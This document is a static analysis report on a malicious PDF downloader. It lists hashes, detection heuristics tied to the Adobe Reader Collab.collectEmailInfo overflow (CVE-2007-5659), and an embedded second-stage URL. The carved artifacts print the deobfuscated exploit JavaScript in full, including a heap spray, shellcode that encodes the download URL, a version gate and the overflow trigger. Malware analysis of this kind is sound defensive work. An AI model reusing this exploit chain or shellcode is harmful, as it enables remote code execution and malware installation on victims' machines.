Malicious PDF — malware analysis report

Static analysis result for SHA-256 ea00785419ca6bb6…

Verdict: MALICIOUS
File type: PDF
Size: 8.4 KB
First seen: 2026-05-08
MD5: 413350fd53beaff57b8e7b1fe8efef4d
SHA-1: dc0b798ea40c3e917e34940b7728e9228879ac56
SHA-256: ea00785419ca6bb60ce13887547335afaf782aaf44314982936fc4c6e24215af
Risk Score: 266

Malware Insights

MITRE ATT&CK
T1059.001 (PowerShell)

The PDF file contains multiple embedded JavaScript streams, with heuristics indicating obfuscation and the use of String.fromCharCode. The deobfuscated JavaScript streams suggest an intent to download and execute further content. The specific payload and download URL could not be confidently determined due to the obfuscation, but the overall pattern is indicative of a downloader. No document body text was available for analysis.

Machine Learning

  • Nyx PDF Classifier: malicious score 1.0000

Heuristics (9)

  • Collab.collectEmailInfo — CVE-2007-5659 (severity: critical; CVE match: exact; rule: CVE_2007_5659)
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action (severity: low; 4 related findings; rule: PDF_JAVASCRIPT)
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) (severity: high; CVE match: likely; rule: PDF_JS_ADOBE_APSB08_13_PATCH_GATE)
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
    Matched line in script:
    var qf_Imkx = new Array();var L0___b14h_xn = 0;var cdtDa_F24hvN_XM = "";function J_q_Gl6c(WN_7_C8m_7W4, lmk50r5w){var Ak2_t3 = lmk50r5w.toString();var L_82pAV_Q4_u = "";for(var B_0_D443f = 0; B_0_D443f < Ak2_t3.length; B_0_D443f++) {var OKr6__Ud = parseInt(Ak2_t3.substr(B_0_D443f, 1));if (!isNaN(OKr6__Ud)) {OKr6__Ud = OKr6__Ud.toString(16);if (OKr6__Ud.length == 1) { OKr6__Ud = "0" + OKr6__Ud; }else if (OKr6__Ud.length != 2) { OKr6__Ud = "00"; }L_82pAV_Q4_u = OKr6__Ud + L_82pAV_Q4_u;}}while(L_82 …
  • PDF JavaScript exploit cluster (severity: critical; rule: PDF_JS_EXPLOIT_CLUSTER)
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script:
            for (var i=0; i < list.length; i++) {
                result +=  String.fromCharCode(list[i] - jump);
            }
  • PDF exploit shellcode contains an embedded download URL (severity: high; rule: PDF_JS_SHELLCODE_DOWNLOAD_URL)
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream (severity: low; rule: PDF_JS)
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • syncAnnotScan annotation-staging primitive (severity: low; rule: PDF_FOXIT_SYNCANNOTSCAN)
    PDF JavaScript calls syncAnnotScan() — a no-op annotation-enumeration primitive used by exploit-kit JavaScript to stage payload reads from annotation /Subject fields before eval(). Not a vulnerable sink itself; rarely seen in legitimate PDFs. (identified after JavaScript deobfuscation)
  • Suspicious extracted artifact (severity: info; rule: EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (severity: info; rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://geonetsa.com/cgi-bin/ca7/z002106201r0019R7c76423aXd1f40e5aY7ea952acZ0100f060 (referenced by PDF JavaScript)

Extracted artifacts (4)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0004_000.js | pdf-javascript-stream | PDF /JS object 4 at offset 0xE1 | 1940 bytes
SHA-256: be4694a17eb89a55f7eb3db389ba2bc4f102f4c7dcfc99549d848cdb7df5dfb5
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script (first 1,000 lines of the extracted script)
sourceCode = "118,97,114,32,112,114,32,61,32,110,117,108,108,59,13,10,118,97,114,32,102,110,99,32,61,32,39,101,118,39,59,13,10,118,97,114,32,115,117,109,32,61,32,39,39,59,13,10,13,10,97,112,112,46,100,111,99,46,115,121,110,99,65,110,110,111,116,83,99,97,110,40,41,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,33,61,32,48,41,32,123,13,10,9,118,97,114,32,110,117,109,32,61,32,49,59,13,10,13,10,9,112,114,32,61,32,97,112,112,46,100,111,99,46,103,101,116,65,110,110,111,116,115,40,13,10,9,9,123,13,10,9,9,9,110,80,97,103,101,58,32,48,13,10,9,9,125,13,10,9,41,59,13,10,13,10,9,115,117,109,32,61,32,112,114,91,110,117,109,93,46,115,117,98,106,101,99,116,59,13,10,125,13,10,13,10,118,97,114,32,98,117,102,32,61,32,34,34,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,32,51,41,32,123,13,10,9,102,110,99,32,43,61,32,39,97,39,59,13,10,9,118,97,114,32,97,114,114,32,61,32,115,117,109,46,115,112,108,105,116,40,47,45,47,41,59,10,9,118,97,114,32,112,114,111,99,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,50,50,43,49,53,41,59,10,9,13,10,9,102,111,114,32,40,118,97,114,32,105,32,61,32,49,59,32,105,32,60,32,97,114,114,46,108,101,110,103,116,104,59,32,105,43,43,41,32,123,13,10,9,9,98,117,102,32,43,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,34,48,120,34,43,97,114,114,91,105,93,41,59,13,10,9,125,13,10,125,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,61,32,50,41,32,123,13,10,9,102,110,99,32,43,61,32,39,108,39,59,13,10,9,97,112,112,91,102,110,99,93,40,98,117,102,41,59,13,10,125,13,10"; 
function decrypt(str, jump){
var result = "";
var list = str.split(',');
        for (var i=0; i < list.length; i++) {
            result +=  String.fromCharCode(list[i] - jump);
        }
        return result;
        }
numeric_charcode_stage_000.js | deobfuscated-js | numeric char-code string decoded JavaScript at offset 0xEF | 505 bytes
SHA-256: 6c41320119e160dc719997b9a2efb3600ea9d7e9d7e44b4dc2125762dc9f365f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script (first 1,000 lines of the extracted script)
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);
	var proc = String.fromCharCode(22+15);
	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
}

if (app.plugIns.length >= 2) {
	fnc += 'l';
	app[fnc](buf);
}
legacy_pdfkit_stage_000.js | deobfuscated-js | repeated-marker hex decoded JavaScript at offset 0x1C2F | 1769 bytes
SHA-256: 522bb58f8e0709d6de77ee32690d83b5a3357aada2bf7e1817a7a9c3d2a57e76
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script (first 1,000 lines of the extracted script)
function a4c43x4jUbd_R6(a_32E_d48, L_D__V13d22t){var nH02__3a__8 = 4;var b1hEusB_f = new Array();var GABLLmao0o = new Array(107,256,11,  512, 106, 11,  44,40, 33);GABLLmao0o[5] += 12;var En__8h = "";try {var ab2v7f = 0;if (app) {L_D__V13d22t = pr[ab2v7f].subject;}} catch(e) {}if (!a_32E_d48) { b1hEusB_f[0] = 0;b1hEusB_f[1] = b1hEusB_f[0];b1hEusB_f[2] = b1hEusB_f[1];b1hEusB_f[3] = b1hEusB_f[2];var N__mw_38gn7 = GABLLmao0o[6] + 3;var W6JGtD = N__mw_38gn7 + 11;var ymv_2n_45_76_SC = a4c43x4jUbd_R6;var CyUM5_6_3_MjH_L = 0;ymv_2n_45_76_SC = ymv_2n_45_76_SC.toString();for(var O16rSn = 0; O16rSn < ymv_2n_45_76_SC.length; O16rSn++) {var f5Xw1qP7tl_p = ymv_2n_45_76_SC.charCodeAt(O16rSn);if (f5Xw1qP7tl_p > N__mw_38gn7 && f5Xw1qP7tl_p < W6JGtD) {if (CyUM5_6_3_MjH_L == 4) {CyUM5_6_3_MjH_L = 0;}b1hEusB_f[CyUM5_6_3_MjH_L] += f5Xw1qP7tl_p;if (b1hEusB_f[CyUM5_6_3_MjH_L] > GABLLmao0o[3]) {b1hEusB_f[CyUM5_6_3_MjH_L] -= 512;}CyUM5_6_3_MjH_L++;}}}else  { b1hEusB_f = a_32E_d48;}for (var E_B7_uj00_q27L = 0; E_B7_uj00_q27L < 4; E_B7_uj00_q27L++) {if (b1hEusB_f[E_B7_uj00_q27L] > GABLLmao0o[1]) {b1hEusB_f[E_B7_uj00_q27L] -= GABLLmao0o[1];}}var MF__C__T5 = 0;var a8j3x_1j__a_8 = 0;var u3b_p__Fef;var X_2Fxu7A = 0;while ( MF__C__T5 < L_D__V13d22t.length ) {var o_o_YP_cmT = "";o_o_YP_cmT = L_D__V13d22t.substr(MF__C__T5, 2);var Od_Be_u7msS_U7 = parseInt(o_o_YP_cmT, GABLLmao0o[5]); if (a8j3x_1j__a_8 == 4) {a8j3x_1j__a_8 = 0;}Od_Be_u7msS_U7 -= (X_2Fxu7A + 2) * b1hEusB_f[a8j3x_1j__a_8];if (Od_Be_u7msS_U7 < 0) {Od_Be_u7msS_U7 -= Math.floor(Od_Be_u7msS_U7 / GABLLmao0o[1]) * GABLLmao0o[1];}En__8h += String.fromCharCode(Od_Be_u7msS_U7);{MF__C__T5 += 2;X_2Fxu7A++;a8j3x_1j__a_8++;}}var xYe_a6N83_14e = this;xYe_a6N83_14e["eval"](En__8h);return 0;}

	a4c43x4jUbd_R6(0);
legacy_pdfkit_stage_001.js | deobfuscated-js | annotation-subject callee-key decoded JavaScript at offset 0x4C3 | 4997 bytes
SHA-256: aff1ad2842cac3a690b2464f3f07ba06faa4c94e8f24a5dfc5569b4a55c80d66
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script (first 1,000 lines of the extracted script)
var qf_Imkx = new Array();var L0___b14h_xn = 0;var cdtDa_F24hvN_XM = "";function J_q_Gl6c(WN_7_C8m_7W4, lmk50r5w){var Ak2_t3 = lmk50r5w.toString();var L_82pAV_Q4_u = "";for(var B_0_D443f = 0; B_0_D443f < Ak2_t3.length; B_0_D443f++) {var OKr6__Ud = parseInt(Ak2_t3.substr(B_0_D443f, 1));if (!isNaN(OKr6__Ud)) {OKr6__Ud = OKr6__Ud.toString(16);if (OKr6__Ud.length == 1) { OKr6__Ud = "0" + OKr6__Ud; }else if (OKr6__Ud.length != 2) { OKr6__Ud = "00"; }L_82pAV_Q4_u = OKr6__Ud + L_82pAV_Q4_u;}}while(L_82pAV_Q4_u.length < 8) { L_82pAV_Q4_u = "0" + L_82pAV_Q4_u; }var eU_Q7k46m = WN_7_C8m_7W4.toString(16);if (eU_Q7k46m.length == 1) { eU_Q7k46m = "0" + eU_Q7k46m; }else if (eU_Q7k46m.length != 2) { eU_Q7k46m = "00"; }L_82pAV_Q4_u = "3" + eU_Q7k46m + "P" + L_82pAV_Q4_u;return L_82pAV_Q4_u;}function gy_y_a_80Of_2(tg_8Y_l3_g_w4, QWH2wEW6){var es_t7WE8NU__Mim = new Array("");var q_tr6sEAR54__0R = tg_8Y_l3_g_w4;var Jd283Cy65dp;if ((Jd283Cy65dp = tg_8Y_l3_g_w4.lastIndexOf("%u00")) != -1) {if (Jd283Cy65dp + 6 == tg_8Y_l3_g_w4.length) {es_t7WE8NU__Mim[0] = tg_8Y_l3_g_w4.substr(Jd283Cy65dp + 4, 2);q_tr6sEAR54__0R = tg_8Y_l3_g_w4.substring(0, Jd283Cy65dp);}}Jd283Cy65dp = 1;for (B_0_D443f = 0; B_0_D443f < QWH2wEW6.length; B_0_D443f++) {var t5Tt6_B_J__V3 = QWH2wEW6.charCodeAt(B_0_D443f).toString(16);if (t5Tt6_B_J__V3.length == 1) { t5Tt6_B_J__V3 = "0" + t5Tt6_B_J__V3; }es_t7WE8NU__Mim[Jd283Cy65dp] = t5Tt6_B_J__V3;Jd283Cy65dp++;}B_0_D443f = es_t7WE8NU__Mim[0].length ? 
0 : 1;es_t7WE8NU__Mim[Jd283Cy65dp] = "00";es_t7WE8NU__Mim[Jd283Cy65dp + 1] = "00";Jd283Cy65dp += 2;if ((es_t7WE8NU__Mim.length - B_0_D443f) % 2) {es_t7WE8NU__Mim[Jd283Cy65dp] = "00";}while(B_0_D443f < es_t7WE8NU__Mim.length) {q_tr6sEAR54__0R += "%u" + es_t7WE8NU__Mim[B_0_D443f + 1] + es_t7WE8NU__Mim[B_0_D443f];B_0_D443f += 2;}q_tr6sEAR54__0R += "%u0000";return q_tr6sEAR54__0R;}function EsRRli___u(w5v2Bde, Pay_0e){while (w5v2Bde.length*2<Pay_0e) {w5v2Bde += w5v2Bde;}w5v2Bde = w5v2Bde.substring(0,Pay_0e/2);return w5v2Bde;}function apuP3__6100WaM(B8_3uP26, A1MB__b_R4, L_____nWf){var Hq3dw___Euv4_X = 0x0c0c0c0c;var w5v2Bde = unescape(A1MB__b_R4);var QWH2wEW6 = J_q_Gl6c(B8_3uP26, L_____nWf);var PSr_8rWptF = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var tg_8Y_l3_g_w4 = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%u9090%u00e8%u0000%ueb00%ue900%u00fc%u0000%u645f%u30a1%u0000%u7800%u8b0c%u0c40%u708b%uad1c%u688b%ueb08%u8b09%u3440%u408d%u8b7c%u3c68%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u782e%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%ud63a%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%uffe8%ufffe%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u5670%u6257%u0054%u7468%u7074%u2f3a%u672f%u6f65%u656e%u7374%u2e61%u6f63%u2f6d%u6763%u2d69%u6962%u2f6e%u6163%u2f37%u307a%u3230%u3031%
u3236%u3130%u3072%u3130%u5239%u6337%u3637%u3234%u6133%u6458%u6631%u3034%u3565%u5961%u6537%u3961%u3235%u6361%u305a%u3031%u6630%u3630%u0030";app.lHH_V_b5p = unescape(gy_y_a_80Of_2(tg_8Y_l3_g_w4, QWH2wEW6));var Ri3_0_IM2 = 0x400000;var rGto__n = PSr_8rWptF.length * 2;var Pay_0e = Ri3_0_IM2 - (rGto__n+0x38);w5v2Bde = EsRRli___u(w5v2Bde, Pay_0e);var XlP_7e_E____vS3 = (Hq3dw___Euv4_X - 0x400000)/Ri3_0_IM2;for (var df0_M0_0vx = 0; df0_M0_0vx < XlP_7e_E____vS3; df0_M0_0vx++) {qf_Imkx[df0_M0_0vx] = w5v2Bde + PSr_8rWptF;}}function W5m1Jp1lt_L_4(){var DA0__4l31v = "";for (B_0_D443f = 0; B_0_D443f < 12; B_0_D443f++) {DA0__4l31v += unescape("%u0c0c%u0c0c");}var G__x8s_PfB_0 = "";for (B_0_D443f = 0; B_0_D443f < 750; B_0_D443f++) {G__x8s_PfB_0 += DA0__4l31v;}this.collabStore = Collab.collectEmailInfo({subj: "", msg: G__x8s_PfB_0});app.clearTimeOut(L0___b14h_xn);}function YkIW__joK8k55jn(h63PA807__V_f){var wL_PhwfgaN = L0___b14h_xn;if ((h63PA807__V_f >= 8 && h63PA807__V_f < 8.11) || h63PA807__V_f < 7.1) {apuP3__6100WaM(23, "%u0c0c%u0c0c", h63PA807__V_f);W5m1Jp1lt_L_4();}if (wL_PhwfgaN) {app.clearTimeOut(wL_PhwfgaN);}}var L_____nWf = 0;var X15q_Ud0Hd = app.plugIns;for (var OL_1__84C7i = 0; OL_1__84C7i < X15q_Ud0Hd.length; OL_1__84C7i++) {var riX___Uq5MY = X15q_Ud0Hd[OL_1__84C7i].version;if (riX___Uq5MY > L_____nWf) { L_____nWf = riX___Uq5MY; }}if (app.viewerVersion == 9.103 && L_____nWf < 9.13) {L_____nWf = 9.13;}app.h_0O_Lag = YkIW__joK8k55jn;L0___b14h_xn = app.setTimeOut("app.h_0O_Lag(" + L_____nWf.toString() + ")", 50);